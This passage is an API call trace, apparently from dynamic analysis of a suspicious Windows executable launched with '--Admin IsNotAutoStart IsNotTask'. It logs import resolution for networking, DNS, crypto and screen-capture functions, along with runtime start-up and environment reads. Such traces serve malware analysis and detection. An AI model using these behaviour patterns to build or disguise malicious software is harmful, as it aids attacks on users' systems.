lpProcName="ShellExecuteExW") returned 0x759f1e46 [0089.069] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0089.069] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0089.069] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0089.069] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0089.069] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0089.069] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0089.070] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0089.070] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0089.070] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0089.071] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0089.071] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0089.077] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0089.077] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0089.079] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0089.080] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0089.080] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0089.080] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0089.088] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0089.088] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0089.088] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0089.088] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0089.089] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0089.089] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0089.089] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0089.089] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0089.089] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0089.109] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0089.109] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0089.109] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0089.109] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0089.110] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0089.110] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0089.110] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0089.116] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0089.116] atexit (param_1=0x6f0920) returned 0 [0089.129] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f808 | out: lpSystemTimeAsFileTime=0x18f808*(dwLowDateTime=0x365bad00, dwHighDateTime=0x1d60a66)) [0089.129] GetCurrentThreadId () returned 0x7ec [0089.129] GetCurrentProcessId () returned 0x114 [0089.129] QueryPerformanceCounter (in: lpPerformanceCount=0x18f800 | out: lpPerformanceCount=0x18f800*=20945382210) returned 1 [0089.166] GetStartupInfoW (in: lpStartupInfo=0x18f798 | out: lpStartupInfo=0x18f798*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0089.178] GetProcessHeap () returned 0x240000 [0089.346] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0089.346] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0089.346] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0089.347] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0089.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0089.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0089.350] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0089.351] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3bc) returned 0x25f8b8 [0089.351] GetCurrentThreadId () returned 0x7ec [0089.363] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x18) returned 0x250af8 [0089.364] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x800) returned 0x25fc80 [0089.364] GetStartupInfoW (in: lpStartupInfo=0x18f768 | out: lpStartupInfo=0x18f768*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xd7fc8504, hStdError=0x44)) [0089.364] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0089.364] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0089.364] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0089.364] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask" [0089.364] GetEnvironmentStringsW () returned 0x260488* [0089.364] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xaca) returned 0x260f60 [0089.449] FreeEnvironmentStringsW (penv=0x260488) returned 1 [0089.458] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xa5 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1a2) returned 0x261a38 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x98) returned 0x261be8 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3e) returned 0x255bb8 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6c) returned 0x261c88 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6e) returned 0x261d00 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x78) returned 0x251e00 [0089.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x62) returned 0x261d78 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x25b4a8 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x257060 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x28) returned 0x25aea0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1a) returned 0x25f670 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4a) returned 0x261de8 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x72) returned 0x251e80 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x25b4e0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x25b518 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1c) returned 0x25f698 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xd2) returned 0x261e40 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x261f20 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x261fa8 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3a) returned 0x255c00 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x90) returned 0x260488 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25aed0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x25b550 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x260520 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x2570b0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x260560 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x255c48 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x82) returned 0x2605c0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x25b588 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x25f6c0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2c) returned 0x25b5c0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x260650 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x2606b0 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x25b5f8 [0089.459] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x255c90 [0089.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x260710 [0089.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25af00 [0089.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x25b630 [0089.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8c) returned 0x260770 [0089.460] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x260f60 | out: hHeap=0x240000) returned 1 [0089.606] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x800) returned 0x260808 [0089.615] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x80) returned 0x261010 [0089.674] GetLastError () returned 0x0 [0089.674] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x220) returned 0x261098 [0089.674] GetLastError () returned 0x0 [0089.675] IsValidCodePage (CodePage=0x4e4) returned 1 [0089.675] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f75c | out: lpCPInfo=0x18f75c) returned 1 [0089.682] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f224 | out: lpCPInfo=0x18f224) returned 1 [0089.688] GetLastError () returned 0x0 [0089.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0089.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0089.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f538, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿô…ü×t÷\x18", lpUsedDefaultChar=0x0) returned 256 [0089.695] GetLastError () returned 0x0 [0089.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0089.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0089.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f438, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿô…ü×t÷\x18", lpUsedDefaultChar=0x0) returned 256 [0089.702] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0089.702] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4037ad [0089.732] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261010) returned 0x80 [0089.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0089.744] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1f) returned 0x25f6e8 [0089.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x25f6e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0089.757] GetLastError () returned 0x0 [0089.757] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x4) returned 0x2612c0 [0089.757] 